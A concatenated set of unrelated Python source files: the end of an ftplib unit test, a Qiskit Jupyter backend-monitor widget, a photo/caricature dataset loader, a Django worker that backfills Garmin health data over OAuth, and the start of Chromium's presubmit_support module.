self.assertEqual(self.client.getwelcome(), '220 welcome')
def test_sanitize(self):
self.assertEqual(self.client.sanitize('foo'), repr('foo'))
self.assertEqual(self.client.sanitize('pass 12345'), repr('pass *****'))
self.assertEqual(self.client.sanitize('PASS 12345'), repr('PASS *****'))
def test_exceptions(self):
self.assertRaises(ftplib.error_temp, self.client.sendcmd, 'echo 400')
self.assertRaises(ftplib.error_temp, self.client.sendcmd, 'echo 499')
self.assertRaises(ftplib.error_perm, self.client.sendcmd, 'echo 500')
self.assertRaises(ftplib.error_perm, self.client.sendcmd, 'echo 599')
self.assertRaises(ftplib.error_proto, self.client.sendcmd, 'echo 999')
def test_all_errors(self):
exceptions = (ftplib.error_reply, ftplib.error_temp, ftplib.error_perm,
ftplib.error_proto, ftplib.Error, IOError, EOFError)
for x in exceptions:
try:
raise x('exception not included in all_errors set')
except ftplib.all_errors:
pass
def test_set_pasv(self):
# passive mode is supposed to be enabled by default
self.assertTrue(self.client.passiveserver)
self.client.set_pasv(True)
self.assertTrue(self.client.passiveserver)
self.client.set_pasv(False)
self.assertFalse(self.client.passiveserver)
def test_voidcmd(self):
self.client.voidcmd('echo 200')
self.client.voidcmd('echo 299')
self.assertRaises(ftplib.error_reply, self.client.voidcmd, 'echo 199')
self.assertRaises(ftplib.error_reply, self.client.voidcmd, 'echo 300')
def test_login(self):
self.client.login()
def test_acct(self):
self.client.acct('passwd')
def test_rename(self):
self.client.rename('a', 'b')
self.server.handler.next_response = '200'
self.assertRaises(ftplib.error_reply, self.client.rename, 'a', 'b')
def test_delete(self):
self.client.delete('foo')
self.server.handler.next_response = '199'
self.assertRaises(ftplib.error_reply, self.client.delete, 'foo')
def test_size(self):
self.client.size('foo')
def test_mkd(self):
dir = self.client.mkd('/foo')
self.assertEqual(dir, '/foo')
def test_rmd(self):
self.client.rmd('foo')
def test_pwd(self):
dir = self.client.pwd()
self.assertEqual(dir, 'pwd ok')
def test_quit(self):
self.assertEqual(self.client.quit(), '221 quit ok')
# Ensure the connection gets closed; sock attribute should be None
self.assertEqual(self.client.sock, None)
def test_retrbinary(self):
received = []
self.client.retrbinary('retr', received.append)
self.assertEqual(''.join(received), RETR_DATA)
def test_retrlines(self):
received = []
self.client.retrlines('retr', received.append)
self.assertEqual(''.join(received), RETR_DATA.replace('\r\n', ''))
def test_storbinary(self):
f = StringIO.StringIO(RETR_DATA)
self.client.storbinary('stor', f)
self.assertEqual(self.server.handler.last_received_data, RETR_DATA)
# test new callback arg
flag = []
f.seek(0)
self.client.storbinary('stor', f, callback=lambda x: flag.append(None))
self.assertTrue(flag)
def test_storlines(self):
f = StringIO.StringIO(RETR_DATA.replace('\r\n', '\n'))
self.client.storlines('stor', f)
self.assertEqual(self.server.handler.last_received_data, RETR_DATA)
# test new callback arg
flag = []
f.seek(0)
self.client.storlines('stor foo', f, callback=lambda x: flag.append(None))
self.assertTrue(flag)
def test_nlst(self):
self.client.nlst()
self.assertEqual(self.client.nlst(), NLST_DATA.split('\r\n')[:-1])
def test_dir(self):
l = []
self.client.dir(lambda x: l.append(x))
self.assertEqual(''.join(l), LIST_DATA.replace('\r\n', ''))
def test_makeport(self):
self.client.makeport()
# IPv4 is in use, just make sure send_eprt has not been used
self.assertEqual(self.server.handler.last_received_cmd, 'port')
def test_makepasv(self):
host, port = self.client.makepasv()
conn = socket.create_connection((host, port), 2)
conn.close()
# IPv4 is in use, just make sure send_epsv has not been used
self.assertEqual(self.server.handler.last_received_cmd, 'pasv')
class TestIPv6Environment(TestCase):
def setUp(self):
self.server = DummyFTPServer((HOST, 0), af=socket.AF_INET6)
self.server.start()
self.client = ftplib.FTP()
self.client.connect(self.server.host, self.server.port)
def tearDown(self):
self.client.close()
self.server.stop()
def test_af(self):
self.assertEqual(self.client.af, socket.AF_INET6)
def test_makeport(self):
self.client.makeport()
self.assertEqual(self.server.handler.last_received_cmd, 'eprt')
def test_makepasv(self):
host, port = self.client.makepasv()
conn = socket.create_connection((host, port), 2)
conn.close()
self.assertEqual(self.server.handler.last_received_cmd, 'epsv')
def test_transfer(self):
def retr():
received = []
self.client.retrbinary('retr', received.append)
self.assertEqual(''.join(received), RETR_DATA)
self.client.set_pasv(True)
retr()
self.client.set_pasv(False)
retr()
class TestTimeouts(TestCase):
def setUp(self):
self.evt = threading.Event()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(3)
self.port = test_support.bind_port(self.sock)
threading.Thread(target=self.server, args=(self.evt,self.sock)).start()
# Wait for the server to be ready.
self.evt.wait()
self.evt.clear()
ftplib.FTP.port = self.port
def tearDown(self):
self.evt.wait()
def server(self, evt, serv):
# This method sets the evt 3 times:
# 1) when the connection is ready to be accepted.
# 2) when it is safe for the caller to close the connection
# 3) when we have closed the socket
serv.listen(5)
# (1) Signal the caller that we are ready to accept the connection.
evt.set()
try:
conn, addr = serv.accept()
except socket.timeout:
pass
else:
conn.send("1 Hola mundo\n")
# (2) Signal the caller that it is safe to close the socket.
evt.set()
conn.close()
finally:
serv.close()
# (3) Signal the caller that we are done.
evt.set()
def testTimeoutDefault(self):
# default -- use global socket timeout
self.assert_(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
ftp = ftplib.FTP("localhost")
finally:
socket.setdefaulttimeout(None)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def testTimeoutNone(self):
# no timeout -- do not use global socket timeout
self.assert_(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
ftp = ftplib.FTP("localhost", timeout=None)
finally:
socket.setdefaulttimeout(None)
self.assertTrue(ftp.sock.gettimeout() is None)
self.evt.wait()
ftp.close()
def testTimeoutValue(self):
# a value
ftp = ftplib.FTP(HOST, timeout=30)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def testTimeoutConnect(self):
ftp = ftplib.FTP()
ftp.connect(HOST, timeout=30)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def testTimeoutDifferentOrder(self):
ftp = ftplib.FTP(timeout=30)
ftp.connect(HOST)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def testTimeoutDirectAccess(self):
ftp = ftplib.FTP()
ftp.timeout = 30
ftp.connect(HOST)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def test_main():
tests = [TestFTPClass, TestTimeouts]
if socket.has_ipv6:
try:
DummyFTPServer((HOST, 0), af=socket.AF_INET6)
except socket.error:
pass
else:
tests.append(TestIPv6Environment)
thread_info = test_support.threading_setup()
try:
test_support.run_unittest(*tests)
finally:
test_support.threading_cleanup(*thread_info)
if __name__ == '__main__':
test_main()
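# A minimal standalone sketch of the global-default-timeout pattern the timeout tests
# above exercise (no connection is attempted; the 30-second value is illustrative):
def socket_with_global_default(default=30):
    # Sockets created while a global default timeout is set inherit that timeout.
    socket.setdefaulttimeout(default)
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    finally:
        # Always restore the global default so unrelated code is unaffected.
        socket.setdefaulttimeout(None)
    return s  # s.gettimeout() == default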
|
backend_overview.py
|
# -*- coding: utf-8 -*-
# This code is part of Qiskit.
#
# (C) Copyright IBM 2017, 2018.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""A module for monitoring backends."""
import time
import threading
import types
from IPython.display import display # pylint: disable=import-error
from IPython.core.magic import line_magic, Magics, magics_class # pylint: disable=import-error
from IPython.core import magic_arguments # pylint: disable=import-error
import matplotlib.pyplot as plt # pylint: disable=import-error
import ipywidgets as widgets # pylint: disable=import-error
from qiskit.tools.monitor.backend_overview import get_unique_backends
from qiskit.visualization.gate_map import plot_gate_map
@magics_class
class BackendOverview(Magics):
"""A class of status magic functions.
"""
@line_magic
@magic_arguments.magic_arguments()
@magic_arguments.argument(
'-i',
'--interval',
type=float,
default=60,
help='Interval for status check.'
)
def qiskit_backend_overview(self, line='', cell=None):
"""A Jupyter magic function to monitor backends.
"""
del cell # Unused
args = magic_arguments.parse_argstring(
self.qiskit_backend_overview, line)
unique_hardware_backends = get_unique_backends()
_value = "<h2 style ='color:#ffffff; background-color:#000000;"
_value += "padding-top: 1%; padding-bottom: 1%;padding-left: 1%;"
_value += "margin-top: 0px'>Backend Overview</h2>"
backend_title = widgets.HTML(value=_value,
layout=widgets.Layout(margin='0px 0px 0px 0px'))
build_back_widgets = [backend_widget(b)
for b in unique_hardware_backends]
_backends = []
# Sort backends by operational or not
oper_ord_backends = []
for n, back in enumerate(unique_hardware_backends):
if back.status().operational:
oper_ord_backends = [build_back_widgets[n]] + oper_ord_backends
_backends = [back] + _backends
else:
oper_ord_backends = oper_ord_backends + [build_back_widgets[n]]
_backends = _backends + [back]
qubit_label = widgets.Label(value='Num. Qubits')
qv_label = widgets.Label(value='Quantum Vol.')
pend_label = widgets.Label(value='Pending Jobs',
layout=widgets.Layout(margin='5px 0px 0px 0px'))
least_label = widgets.Label(value='Least Busy',
layout=widgets.Layout(margin='10px 0px 0px 0px'))
oper_label = widgets.Label(
value='Operational', layout=widgets.Layout(margin='5px 0px 0px 0px'))
t12_label = widgets.Label(
value='Avg. T1 / T2', layout=widgets.Layout(margin='10px 0px 0px 0px'))
cx_label = widgets.Label(
value='Avg. CX Err.', layout=widgets.Layout(margin='8px 0px 0px 0px'))
meas_label = widgets.Label(
value='Avg. Meas. Err.', layout=widgets.Layout(margin='8px 0px 0px 0px'))
labels_widget = widgets.VBox([qubit_label, qv_label, pend_label, oper_label,
least_label, t12_label, cx_label, meas_label],
layout=widgets.Layout(margin='295px 0px 0px 0px',
min_width='100px'))
backend_grid = GridBox_with_thread(children=oper_ord_backends,
layout=widgets.Layout(
grid_template_columns='250px ' *
len(unique_hardware_backends),
grid_template_rows='auto',
grid_gap='0px 25px'))
backend_grid._backends = _backends # pylint: disable=attribute-defined-outside-init
backend_grid._update = types.MethodType( # pylint: disable=attribute-defined-outside-init
update_backend_info, backend_grid)
backend_grid._thread = threading.Thread( # pylint: disable=attribute-defined-outside-init
target=backend_grid._update, args=(args.interval,))
backend_grid._thread.start()
back_box = widgets.HBox([labels_widget, backend_grid])
back_monitor = widgets.VBox([backend_title, back_box])
display(back_monitor)
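# Usage sketch (assumes a Jupyter session in which this magics class has been
# registered -- in Qiskit that typically happens on `import qiskit.tools.jupyter`;
# the line below is typed in a notebook cell, not executed as part of this module):
#
#     %qiskit_backend_overview --interval 30
#
# parse_argstring then picks up `--interval 30` and the grid refreshes every 30 s.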
class GridBox_with_thread(widgets.GridBox): # pylint: disable=invalid-name
"""A GridBox that will close an attached thread
"""
def __del__(self):
"""Object disposal"""
if hasattr(self, '_thread'):
try:
self._thread.do_run = False
self._thread.join()
except Exception: # pylint: disable=broad-except
pass
self.close()
def backend_widget(backend):
"""Creates a backend widget.
"""
config = backend.configuration().to_dict()
props = backend.properties().to_dict()
name = widgets.HTML(value="<h4>{name}</h4>".format(name=backend.name()),
layout=widgets.Layout())
num_qubits = config['n_qubits']
qv_val = '-'
if 'quantum_volume' in config.keys():
if config['quantum_volume']:
qv_val = config['quantum_volume']
qubit_count = widgets.HTML(value="<h5><b>{qubits}</b></h5>".format(qubits=num_qubits),
layout=widgets.Layout(justify_content='center'))
qv_value = widgets.HTML(value="<h5>{qubits}</h5>".format(qubits=qv_val),
layout=widgets.Layout(justify_content='center'))
cmap = widgets.Output(layout=widgets.Layout(min_width='250px', max_width='250px',
max_height='250px',
min_height='250px',
justify_content='center',
align_items='center',
margin='0px 0px 0px 0px'))
with cmap:
_cmap_fig = plot_gate_map(backend,
plot_directed=False,
label_qubits=False)
if _cmap_fig is not None:
display(_cmap_fig)
# Prevents plot from showing up twice.
plt.close(_cmap_fig)
pending = generate_jobs_pending_widget()
is_oper = widgets.HTML(value="<h5></h5>",
layout=widgets.Layout(justify_content='center'))
least_busy = widgets.HTML(value="<h5></h5>",
layout=widgets.Layout(justify_content='center'))
t1_units = props['qubits'][0][0]['unit']
avg_t1 = round(sum([q[0]['value'] for q in props['qubits']])/num_qubits, 1)
avg_t2 = round(sum([q[1]['value'] for q in props['qubits']])/num_qubits, 1)
t12_widget = widgets.HTML(value="<h5>{t1} / {t2} {units}</h5>".format(t1=avg_t1,
t2=avg_t2,
units=t1_units),
layout=widgets.Layout())
avg_cx_err = 'NA'
if config['coupling_map']:
sum_cx_err = 0
num_cx = 0
for gate in props['gates']:
if gate['gate'] == 'cx':
for param in gate['parameters']:
if param['name'] == 'gate_error':
# Value == 1.0 means gate effectively off
if param['value'] != 1.0:
sum_cx_err += param['value']
num_cx += 1
# Guard against num_cx == 0 (all CX gates reported as effectively off).
avg_cx_err = round(sum_cx_err / num_cx, 4) if num_cx else 'NA'
cx_widget = widgets.HTML(value="<h5>{cx_err}</h5>".format(cx_err=avg_cx_err),
layout=widgets.Layout())
avg_meas_err = 0
for qub in props['qubits']:
for item in qub:
if item['name'] == 'readout_error':
avg_meas_err += item['value']
avg_meas_err = round(avg_meas_err/num_qubits, 4)
meas_widget = widgets.HTML(value="<h5>{meas_err}</h5>".format(meas_err=avg_meas_err),
layout=widgets.Layout())
out = widgets.VBox([name, cmap, qubit_count, qv_value, pending, is_oper, least_busy,
t12_widget, cx_widget, meas_widget],
layout=widgets.Layout(display='inline-flex',
flex_flow='column',
align_items='center'))
out._is_alive = True
return out
def update_backend_info(self, interval=60):
"""Updates the monitor info
Called from another thread.
"""
my_thread = threading.currentThread()
current_interval = 0
started = False
all_dead = False
stati = [None]*len(self._backends)
while getattr(my_thread, "do_run", True) and not all_dead:
if current_interval == interval or started is False:
for ind, back in enumerate(self._backends):
_value = self.children[ind].children[2].value
_head = _value.split('<b>')[0]
try:
_status = back.status()
stati[ind] = _status
except Exception: # pylint: disable=broad-except
self.children[ind].children[2].value = _value.replace(
_head, "<h5 style='color:#ff5c49'>")
self.children[ind]._is_alive = False
else:
self.children[ind]._is_alive = True
self.children[ind].children[2].value = _value.replace(
_head, "<h5>")
idx = list(range(len(self._backends)))
pending = [s.pending_jobs for s in stati]
_, least_idx = zip(*sorted(zip(pending, idx)))
# Make sure least pending is operational
for ind in least_idx:
if stati[ind].operational:
least_pending_idx = ind
break
for var in idx:
if var == least_pending_idx:
self.children[var].children[6].value = "<h5 style='color:#34bc6e'>True</h5>"
else:
self.children[var].children[6].value = "<h5 style='color:#dc267f'>False</h5>"
self.children[var].children[4].children[1].max = max(
self.children[var].children[4].children[1].max, pending[var]+10)
self.children[var].children[4].children[1].value = pending[var]
if stati[var].operational:
self.children[var].children[5].value = "<h5 style='color:#34bc6e'>True</h5>"
else:
self.children[var].children[5].value = "<h5 style='color:#dc267f'>False</h5>"
started = True
current_interval = 0
time.sleep(1)
all_dead = not any([wid._is_alive for wid in self.children])
current_interval += 1
def generate_jobs_pending_widget():
"""Generates a jobs_pending progress bar widget.
"""
pbar = widgets.IntProgress(
value=0,
min=0,
max=50,
description='',
orientation='horizontal', layout=widgets.Layout(max_width='180px'))
pbar.style.bar_color = '#71cddd'
pbar_current = widgets.Label(
value=str(pbar.value), layout=widgets.Layout(min_width='auto'))
pbar_max = widgets.Label(
value=str(pbar.max), layout=widgets.Layout(min_width='auto'))
def _on_max_change(change):
pbar_max.value = str(change['new'])
def _on_val_change(change):
pbar_current.value = str(change['new'])
pbar.observe(_on_max_change, names='max')
pbar.observe(_on_val_change, names='value')
jobs_widget = widgets.HBox([pbar_current, pbar, pbar_max],
layout=widgets.Layout(max_width='250px',
min_width='250px',
justify_content='center'))
return jobs_widget
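# A standalone sketch of the observe pattern used above (assumes ipywidgets is
# installed; rendering the widgets still requires a Jupyter frontend):
def _observe_demo():
    demo_bar = widgets.IntProgress(value=0, min=0, max=50)
    demo_label = widgets.Label(value=str(demo_bar.value))
    def _sync_label(change):
        # `change['new']` carries the updated trait value.
        demo_label.value = str(change['new'])
    demo_bar.observe(_sync_label, names='value')
    demo_bar.value = 17  # demo_label.value becomes '17'
    return demo_bar, demo_label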
|
dataset.py
|
"""Data fetching
"""
# MIT License
#
# Copyright (c) 2019 Yichun Shi
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import os
import time
import math
import random
import shutil
from multiprocessing import Process, Queue
import h5py
import numpy as np
is_photo = lambda x: os.path.basename(x).startswith('P')
class DataClass(object):
def __init__(self, class_name, indices, label):
self.class_name = class_name
self.indices = np.array(indices)
self.label = label
return
def random_pc_pair(self):
photo_idx = np.random.permutation(self.photo_indices)[0]
caric_idx = np.random.permutation(self.caric_indices)[0]
return np.array([photo_idx, caric_idx])
class Dataset():
def __init__(self, path=None, prefix=None):
self.DataClass = DataClass
self.num_classes = None
self.classes = None
self.images = None
self.labels = None
self.is_photo = None
self.idx2cls = None
self.batch_queue = None
self.batch_workers = None
if path is not None:
self.init_from_list(path, prefix)
def init_from_list(self, filename, prefix=None):
with open(filename, 'r') as f:
lines = f.readlines()
lines = [line.strip().split(' ') for line in lines]
assert len(lines)>0, \
'List file must be in format: "fullpath(str) label(int)"'
images = [line[0] for line in lines]
if prefix is not None:
print('Adding prefix: {}'.format(prefix))
images = [os.path.join(prefix, img) for img in images]
if len(lines[0]) > 1:
labels = [int(line[1]) for line in lines]
else:
labels = [os.path.dirname(img) for img in images]
_, labels = np.unique(labels, return_inverse=True)
self.images = np.array(images, dtype=np.object)
self.labels = np.array(labels, dtype=np.int32)
self.init_classes()
print('%d images of %d classes loaded' % (len(self.images), self.num_classes))
self.separate_photo_caricature()
def separate_photo_caricature(self):
self.is_photo = [is_photo(im) for im in self.images]
self.is_photo = np.array(self.is_photo, dtype=np.bool)
for c in self.classes:
c.photo_indices = c.indices[self.is_photo[c.indices]]
c.caric_indices = c.indices[~self.is_photo[c.indices]]
print('{} photos {} caricatures'.format(self.is_photo.sum(), (~self.is_photo).sum()))
return
def init_classes(self):
dict_classes = {}
classes = []
self.idx2cls = np.ndarray((len(self.labels),)).astype(np.object)
for i, label in enumerate(self.labels):
if not label in dict_classes:
dict_classes[label] = [i]
else:
dict_classes[label].append(i)
for label, indices in dict_classes.items():
classes.append(self.DataClass(str(label), indices, label))
self.idx2cls[indices] = classes[-1]
self.classes = np.array(classes, dtype=np.object)
self.num_classes = len(classes)
def build_subset_from_indices(self, indices, new_labels=True):
subset = type(self)()
subset.images = self.images[indices]
subset.labels = self.labels[indices]
if new_labels:
_, subset.labels = np.unique(subset.labels, return_inverse=True)
subset.init_classes()
print('built subset: %d images of %d classes' % (len(subset.images), subset.num_classes))
return subset
# Data Loading
def get_batch(self, batch_size):
''' Get random pairs of photos and caricatures. '''
indices_batch = []
# Random photo-caricature pair
assert batch_size%2 == 0
classes = np.random.permutation(self.classes)[:batch_size//2]
indices_batch = np.concatenate([c.random_pc_pair() for c in classes], axis=0)
batch = {}
if len(indices_batch) > 0:
batch['images'] = self.images[indices_batch]
batch['labels'] = self.labels[indices_batch]
if self.is_photo is not None:
batch['is_photo'] = self.is_photo[indices_batch]
return batch
# Multithreading preprocessing images
def start_batch_queue(self, batch_size, proc_func=None, maxsize=1, num_threads=3):
self.batch_queue = Queue(maxsize=maxsize)
def batch_queue_worker(seed):
np.random.seed(seed)
while True:
batch = self.get_batch(batch_size)
if proc_func is not None:
batch['image_paths'] = batch['images']
batch['images'] = proc_func(batch['image_paths'])
self.batch_queue.put(batch)
self.batch_workers = []
for i in range(num_threads):
worker = Process(target=batch_queue_worker, args=(i,))
worker.daemon = True
worker.start()
self.batch_workers.append(worker)
def pop_batch_queue(self, timeout=60):
return self.batch_queue.get(block=True, timeout=timeout)
def release_queue(self):
if self.batch_queue is not None:
self.batch_queue.close()
if self.batch_workers is not None:
for w in self.batch_workers:
w.terminate()
del w
self.batch_workers = None
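# A minimal usage sketch (hypothetical list file and prefix; the list file format is
# "fullpath(str) label(int)", as asserted in init_from_list above):
if __name__ == '__main__':
    dataset = Dataset('train_list.txt', prefix='/data/webcaricature')
    batch = dataset.get_batch(batch_size=8)  # 4 random photo/caricature pairs
    # Prefetch batches in worker processes, then consume one and shut down.
    dataset.start_batch_queue(batch_size=8, proc_func=None, num_threads=2)
    prefetched = dataset.pop_batch_queue(timeout=60)
    dataset.release_queue()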
|
worker.py
|
import json
import logging
import signal
import sys
import time
import traceback
from datetime import datetime, timedelta
from threading import Lock, Thread
import pytz
from django.conf import settings
from django.core.exceptions import ObjectDoesNotExist
from requests_oauthlib import OAuth1Session
from oh_template.settings import NUM_OF_SUMMARY_UPLOAD_THREADS
from .consts import BACKFILL_SECONDS, BACKFILL_MIN_YEAR, GARMIN_BACKFILL_URLS, BACKFILL_SLEEP_BETWEEN_CALLS
from .helpers import unix_time_seconds, merge_with_existing_and_upload, get_oh_user_from_garmin_id, group_summaries_per_user_and_per_month, extract_summaries, remove_fields, summaries_to_process_key, \
remove_unwanted_fields, extract_timestamp
from .models import GarminMember, SummariesToProcess, RetrievedData
utc = pytz.UTC
_LOGGER = logging.getLogger(__name__)
handle_summaries_lock = Lock()
locked_summaries = []
process_terminated = False
def terminate_process(signum, frame):
global process_terminated
process_terminated = True
def start_worker_threads():
signal.signal(signal.SIGINT, terminate_process)
signal.signal(signal.SIGTERM, terminate_process)
backfill_thread = Thread(target=handle_backfill)
backfill_thread.start()
for i in range(NUM_OF_SUMMARY_UPLOAD_THREADS):
thread = Thread(target=handle_summaries)
thread.start()
def handle_backfill():
while not process_terminated:
try:
garmin_member = GarminMember.objects.get(was_backfilled=False, userid__isnull=False, has_health_export_permission=True)
handle_backfill_for_member(garmin_member)
except ObjectDoesNotExist:
# Nothing to do
time.sleep(0.5)
def handle_backfill_for_member(garmin_member):
oauth = OAuth1Session(
client_key=settings.GARMIN_KEY,
client_secret=settings.GARMIN_SECRET,
resource_owner_key=garmin_member.access_token,
resource_owner_secret=garmin_member.access_token_secret
)
end_date = datetime.utcnow()
start_date = end_date - timedelta(seconds=BACKFILL_SECONDS)
_LOGGER.info(f"Executing backfill for user {get_oh_user_from_garmin_id(garmin_member.userid)}")
while start_date.year >= BACKFILL_MIN_YEAR:
start_epoch = unix_time_seconds(start_date)
end_epoch = unix_time_seconds(end_date)
for url in GARMIN_BACKFILL_URLS:
if process_terminated:
return # Terminate this thread
summary_url = f"{url}?summaryStartTimeInSeconds={start_epoch}&summaryEndTimeInSeconds={end_epoch}"
res = oauth.get(url=summary_url)
if res.status_code != 202:
_LOGGER.error(f"Invalid response for backfill url {summary_url}, got response response: {res.content},{res.status_code}")
# Failed to call all backfill's !!
if res.status_code == 403:
# Something is wrong with the user's authorisation token. They might have revoked the authorization...
garmin_member.has_health_export_permission = False
garmin_member.save()
# We'll stop executing them for this user, in the next run of the handle_backfill thread,
# this function will be called again for this user (if it's authorized), since was_backfilled is still False
return
else:
_LOGGER.info(f"Called backfill {summary_url}")
time.sleep(BACKFILL_SLEEP_BETWEEN_CALLS)
end_date = start_date
start_date = start_date - timedelta(seconds=BACKFILL_SECONDS)
garmin_member.was_backfilled = True
garmin_member.save()
_LOGGER.info(f"Backfill finished for user {get_oh_user_from_garmin_id(garmin_member.userid)}")
def handle_summaries():
while not process_terminated:
not_locked_summaries = None
with handle_summaries_lock:
for summaries_to_process in SummariesToProcess.objects.all():
if summaries_to_process_key(summaries_to_process) not in locked_summaries:
not_locked_summaries = summaries_to_process
break
if not_locked_summaries is not None:
key = summaries_to_process_key(not_locked_summaries)
locked_summaries.append(key)
if not_locked_summaries is not None:
try:
process_summaries_for_user_and_file(not_locked_summaries.file_name, not_locked_summaries.garmin_user_id)
finally:
locked_summaries.remove(summaries_to_process_key(not_locked_summaries))
else:
# Nothing to do
time.sleep(0.5)
def update_retrieved_data_log(oh_user, summaries, file_name):
if len(summaries) == 0:
return # Nothing to do
data_type = "-".join(file_name.split("-")[:-2])
min_timestamp = min(map(lambda summary: extract_timestamp(summary).timestamp(), summaries))
max_timestamp = max(map(lambda summary: extract_timestamp(summary).timestamp(), summaries))
min_date = utc.localize(datetime.fromtimestamp(min_timestamp))
max_date = utc.localize(datetime.fromtimestamp(max_timestamp))
with handle_summaries_lock:
try:
retrieved_data = RetrievedData.objects.get(member=oh_user, data_type=data_type)
retrieved_data.min_date = min_date if min_date < retrieved_data.min_date else retrieved_data.min_date
retrieved_data.max_date = max_date if max_date > retrieved_data.max_date else retrieved_data.max_date
except ObjectDoesNotExist:
retrieved_data = RetrievedData(member=oh_user, data_type=data_type, min_date=min_date, max_date=max_date)
retrieved_data.save()
def process_summaries_for_user_and_file(file_name, garmin_user_id):
summaries_to_process_all = SummariesToProcess.objects.filter(garmin_user_id__exact=garmin_user_id, file_name__exact=file_name)
summaries = []
ids_to_delete = []
for summaries_to_process in summaries_to_process_all:
ids_to_delete.append(summaries_to_process.id)
summaries += json.loads(summaries_to_process.summaries_json)
try:
oh_user = get_oh_user_from_garmin_id(garmin_user_id)
all_summaries = merge_with_existing_and_upload(oh_user, summaries, file_name)
update_retrieved_data_log(oh_user, all_summaries, file_name)
SummariesToProcess.objects.filter(id__in=ids_to_delete).delete()
_LOGGER.info(f"Saved {len(all_summaries)} summaries for garmin_user_id={garmin_user_id}, file_name={file_name}")
except Exception as e:
_LOGGER.error(f"Failed to handle summaries JSON {file_name}: {e!r}")
traceback.print_exc()
# Reschedule handling
save_summaries_for_delayed_processing(file_name, garmin_user_id, summaries)
def handle_summaries_delayed(body, summaries_name, data_type, fields_to_remove=None):
body = body.decode('utf-8')
summaries = extract_summaries(body, summaries_name)
if fields_to_remove is not None:
remove_fields(summaries, fields_to_remove)
grouped_summaries = group_summaries_per_user_and_per_month(summaries)
for garmin_user_id, monthly_summaries in grouped_summaries.items():
for year_month, summaries in monthly_summaries.items():
file_name = f"{data_type}-{year_month}"
remove_unwanted_fields(summaries)
save_summaries_for_delayed_processing(file_name, garmin_user_id, summaries)
def save_summaries_for_delayed_processing(file_name, garmin_user_id, summaries):
_LOGGER.info(f"Saving {len(summaries)} summaries {file_name} for user {garmin_user_id} for further processing")
summaries_to_process = SummariesToProcess()
summaries_to_process.summaries_json = json.dumps(summaries)
summaries_to_process.garmin_user_id = garmin_user_id
summaries_to_process.file_name = file_name
summaries_to_process.save()
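# A minimal sketch of the per-user / per-month grouping that
# group_summaries_per_user_and_per_month (imported from .helpers) is assumed to
# perform; the 'userId' and 'startTimeInSeconds' field names are illustrative:
def _group_per_user_and_month_sketch(summaries):
    from collections import defaultdict
    grouped = defaultdict(lambda: defaultdict(list))
    for summary in summaries:
        month = datetime.utcfromtimestamp(summary['startTimeInSeconds']).strftime('%Y-%m')
        grouped[summary['userId']][month].append(summary)
    return grouped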
|
presubmit_support.py
|
#!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Enables directory-specific presubmit checks to run at upload and/or commit.
"""
from __future__ import print_function
__version__ = '2.0.0'
# TODO(joi) Add caching where appropriate/needed. The API is designed to allow
# caching (between all different invocations of presubmit scripts for a given
# change). We should add it as our presubmit scripts start feeling slow.
import argparse
import ast # Exposed through the API.
import contextlib
import cpplint
import fnmatch # Exposed through the API.
import glob
import inspect
import itertools
import json # Exposed through the API.
import logging
import multiprocessing
import os # Somewhat exposed through the API.
import random
import re # Exposed through the API.
import signal
import six
import sys # Parts exposed through API.
import tempfile # Exposed through the API.
import threading
import time
import traceback
import unittest # Exposed through the API.
from warnings import warn
# Local imports.
import fix_encoding
import gclient_paths # Exposed through the API
import gclient_utils
import git_footers
import gerrit_util
import owners as owners_db
import owners_client
import owners_finder
import presubmit_canned_checks
import rdb_wrapper
import scm
import subprocess2 as subprocess # Exposed through the API.
if sys.version_info.major == 2:
# TODO(1009814): Expose urllib2 only through urllib_request and urllib_error
import urllib2 # Exposed through the API.
import urlparse
import urllib2 as urllib_request
import urllib2 as urllib_error
else:
import urllib.parse as urlparse
import urllib.request as urllib_request
import urllib.error as urllib_error
# Ask for feedback only once in program lifetime.
_ASKED_FOR_FEEDBACK = False
def time_time():
# Use this so that it can be mocked in tests without interfering with python
# system machinery.
return time.time()
class PresubmitFailure(Exception):
pass
class CommandData(object):
def __init__(self, name, cmd, kwargs, message, python3=False):
self.name = name
self.cmd = cmd
self.stdin = kwargs.get('stdin', None)
self.kwargs = kwargs.copy()
self.kwargs['stdout'] = subprocess.PIPE
self.kwargs['stderr'] = subprocess.STDOUT
self.kwargs['stdin'] = subprocess.PIPE
self.message = message
self.info = None
self.python3 = python3
# Adapted from
# https://github.com/google/gtest-parallel/blob/master/gtest_parallel.py#L37
#
# An object that catches SIGINT sent to the Python process and notices
